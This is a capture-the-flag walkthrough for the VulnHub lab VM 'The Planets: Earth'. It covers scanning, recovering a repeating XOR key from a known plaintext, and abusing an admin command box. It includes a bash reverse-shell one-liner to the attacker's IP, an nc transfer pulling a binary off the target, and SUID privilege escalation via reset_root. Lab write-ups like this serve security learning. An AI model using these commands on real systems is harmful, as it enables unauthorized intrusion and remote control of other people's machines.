vulnhub THE PLANETS: EARTH

This post draws on the following write-up:
https://blog.gibbons.digital/hacking/2021/11/09/earth.html
It has been a while since I did a box; a weekend is a good time for one.
The usual three steps first: find the target's address.
arp-scan -I eth0 192.168.200.1/24
Target address: 192.168.200.131
nmap -A -sS -sC -p- 192.168.200.131
Ports 80 and 443 come back open.
Two important DNS names show up in the TLS certificate on 443: DNS:earth.local, DNS:terratest.earth.local
Browsing to port 80 by IP doesn't work (the site is served by hostname), so add the names to /etc/hosts:
echo "192.168.200.131 earth.local terratest.earth.local" >> /etc/hosts
Try again and it loads.
Next, directory brute force with dirsearch:
dirsearch -u http://terratest.earth.local
dirsearch -u https://terratest.earth.local
dirsearch -u https://earth.local/
dirsearch -u http://earth.local/
The HTTPS scan turns up a robots.txt, which is exactly where you would expect the hint to be.
It lists /testingnotes.*
Brute-force the extension; a quick script will do:

import requests
import urllib3

# terratest.earth.local uses a self-signed certificate, hence verify=False
urllib3.disable_warnings()

url = "https://terratest.earth.local/testingnotes"
suffix = [".asp", ".aspx", ".bat", ".c", ".cfm", ".cgi", ".com", ".dll", ".exe", ".htm", ".html", ".inc", ".jhtml",
          ".jsa", ".json", ".jsp", ".log", ".mdb", ".nsf", ".php", ".phtml", ".pl", ".reg", ".sh", ".sql", ".txt",
          ".xml"]
for i in suffix:
    payload = url + i
    res = requests.get(payload, verify=False)
    if res.status_code == 200:   # only report extensions that actually exist
        print(payload + " exists")
python test.py | grep exists  -> only the .txt extension hits.

Open it:
Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA. // XOR cipher
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption. // known plaintext: testdata.txt
*terra used as username for admin portal. // admin portal username is terra
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly? // keys are rotated (monthly, maybe weekly)
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.
The useful information is in the comments: a reused XOR key, a known plaintext (testdata.txt) and the admin username. XOR with a reused key falls to a single known plaintext, which is what the rest of this post does.
The admin panel turned up during the earlier directory brute force:
https://earth.local/admin/
Username terra; the password still has to be found (brute force would be the fallback).
testdata.txt itself is just a block of text.
The earth.local home page shows a list of hex strings:

3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45

Combined with the hints, these are messages encrypted with the key; the longest one is 806 hex characters, exactly the hex length of testdata.txt, so XORing the two recovers the key stream.
One trap here: copy-pasting the hex can drop or add a character or two. Because int(data1, 16) ^ int(f, 16) lines the two numbers up from the right, any length difference shifts every byte and the output is garbage. Check that both hex strings are 806 characters long and trim any surplus characters from the end before XORing.

import binascii

# data1: the longest of the hex messages on https://earth.local
# (806 hex characters; the value is omitted here). It was XORed with
# testdata.txt, so ciphertext XOR plaintext gives the key stream.
data1 = "..."
f = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()
print(len(data1), len(f))   # both must be 806, otherwise the XOR misaligns
print(hex(int(data1, 16) ^ int(f, 16)))

Let's see what the XOR produces:
0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174
It is obviously periodic; the repeating unit is
6561727468636c696d6174656368616e67656261643468756d616e73
Hex to ASCII:
earthclimatechangebad4humans
Looks like a password.
Login succeeds with terra and this password.
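How the key recovery works, as an added example that is not code from the original post: XOR the ciphertext bytes with the known plaintext bytes to get the key stream, then find the shortest prefix that repeats through it. Working on bytes instead of int(..., 16) avoids two pitfalls of the script above: a length mismatch is reported instead of silently shifting every byte, and leading zero bytes are not lost by hex(). The key used to build the sample is the one derived above; the plaintext, and therefore the ciphertext, are constructed for the demo.

```python
import binascii

# Added example; not code from the original write-up.
# Recover a repeating XOR key from one known plaintext/ciphertext pair.
# KNOWN_KEY is the key the write-up derives; SAMPLE_PLAINTEXT and the
# ciphertext built from it are constructed here for the demo.

KNOWN_KEY = b"earthclimatechangebad4humans"
SAMPLE_PLAINTEXT = (b"This is a constructed test message. It only needs to be "
                    b"longer than the key so that the key stream repeats. ") * 3


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two equal-length byte strings; refuse to misalign silently."""
    if len(a) != len(b):
        raise ValueError(
            f"length mismatch: {len(a)} vs {len(b)} bytes "
            "(check the pasted hex for dropped or extra characters)")
    return bytes(x ^ y for x, y in zip(a, b))


def shortest_period(stream: bytes) -> bytes:
    """Shortest prefix whose repetition reproduces `stream`.

    The last repetition may be partial, as happens when the plaintext
    length is not a multiple of the key length (806 hex chars on the box
    is 403 bytes, not a multiple of 28).
    """
    for n in range(1, len(stream) + 1):
        cand = stream[:n]
        if (cand * (len(stream) // n + 1))[:len(stream)] == stream:
            return cand
    return stream


def encrypt(plaintext: bytes, key: bytes) -> str:
    """Repeating-key XOR, hex-encoded like the messages on earth.local."""
    stream = (key * (len(plaintext) // len(key) + 1))[:len(plaintext)]
    return xor_bytes(plaintext, stream).hex()


def recover_key(cipher_hex: str, plaintext: bytes) -> bytes:
    """Known-plaintext attack: ciphertext XOR plaintext = key stream."""
    cipher = binascii.unhexlify(cipher_hex.strip())
    return shortest_period(xor_bytes(cipher, plaintext))


SAMPLE_CIPHER_HEX = encrypt(SAMPLE_PLAINTEXT, KNOWN_KEY)

if __name__ == "__main__":
    # Against the box: recover_key(<hex from the home page>,
    #                              open("testdata.txt", "rb").read())
    print(recover_key(SAMPLE_CIPHER_HEX, SAMPLE_PLAINTEXT).decode())
```

Against the real box, pass the 806-character hex string and the raw bytes of testdata.txt to recover_key(); if the paste is off by even one character, xor_bytes() raises instead of returning a wrong key.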
The admin panel has a command-execution box. Tried find / -name flag, but it turned up no user flag? (-name matches the whole file name, and the flag file turns out to be user_flag.txt, so find / -name '*flag*' would be needed.)
So get a reverse shell instead. My IP is 192.168.200.128; written as a decimal integer (converted on https://www.ipaddressguide.com/ip) it is 3232286848. Start the nc listener on the attacker first, then run the bash one-liner in the admin panel:
bash -i >& /dev/tcp/3232286848/1234 0>&1
nc -lvvp 1234
find still fails, clearly for lack of privileges, so move on to privilege escalation and start by looking for SUID binaries:
find / -perm -u=s -type f 2>/dev/null
That lists all of them.
One looks promising: /usr/bin/reset_root
Try running /usr/bin/reset_root
Obviously it isn't going to be that easy, so find out why it fails:
ltrace /usr/bin/reset_root
ltrace isn't installed on the target, so pull the binary back with nc (start the listener on the attacker first):
nc -lnvp 9999 > reset_root                              # attacker
nc -w 3 192.168.200.128 9999 < /usr/bin/reset_root      # target
Done. Now run ltrace ./reset_root locally.
This time the error is obvious:
three files it expects are missing, so touch them on the target.
Run reset_root again and it resets the root password. With root in hand you can do whatever you like.
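A helper for the ltrace step, added here and not part of the original post: it scans ltrace-style output for file checks that returned -1 and emits the touch commands to run on the target before retrying the SUID binary. The trace lines and the paths in them are constructed for the example (the real file names reset_root checks for are not reproduced here), and the line format is assumed to be ltrace's default `call(args) = retval`.

```python
import re

# Added example; not code from the original write-up.
# Scan ltrace-style output for file checks that failed (returned -1) and
# emit the `touch` commands needed before re-running the SUID binary.
# The trace below is constructed and its paths are made up; the line
# format assumed is ltrace's default `call(args) = retval`.

SAMPLE_TRACE = """\
setuid(0)                                       = 0
access("/tmp/example_one", 0)                   = -1
access("/tmp/example_two", 0)                   = -1
access("/dev/shm/example_three", 0)             = -1
access("/etc/passwd", 0)                        = 0
puts("Resetting root password...")             = 26
+++ exited (status 1) +++
"""

# Calls that take a path as first argument and return -1 on failure.
FILE_CHECK = re.compile(
    r'^(?P<fn>access|stat|stat64|lstat|open|open64)'
    r'\("(?P<path>[^"]+)"[^)]*\)\s*=\s*(?P<ret>-?\d+)')


def missing_files(trace: str) -> list:
    """Paths whose file check returned -1, in trace order, without duplicates."""
    found = []
    for line in trace.splitlines():
        m = FILE_CHECK.match(line.strip())
        if m and m.group("ret") == "-1" and m.group("path") not in found:
            found.append(m.group("path"))
    return found


def touch_commands(paths) -> list:
    """Shell lines to create the missing files on the target."""
    return ["touch " + p for p in paths]


if __name__ == "__main__":
    # Real use: missing_files(open("trace.txt").read()) with trace.txt
    # written by `ltrace -o trace.txt ./reset_root`.
    for cmd in touch_commands(missing_files(SAMPLE_TRACE)):
        print(cmd)
```

Only the checks that fail are reported, so a binary that also probes files which do exist (like /etc/passwd in the sample) produces just the touch lines you actually need.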
su root
Password: Earth
Run find again and there is no output......
Tried sending a 1.txt back, still empty??
Gave up on that and just spawned another reverse shell; still no output, which left me speechless.
Anyway, the two flags are at
/root/root_flag.txt
/var/earth_web/user_flag.txt
Reference video: https://www.bilibili.com/video/BV1Aq4y1B7Sp/
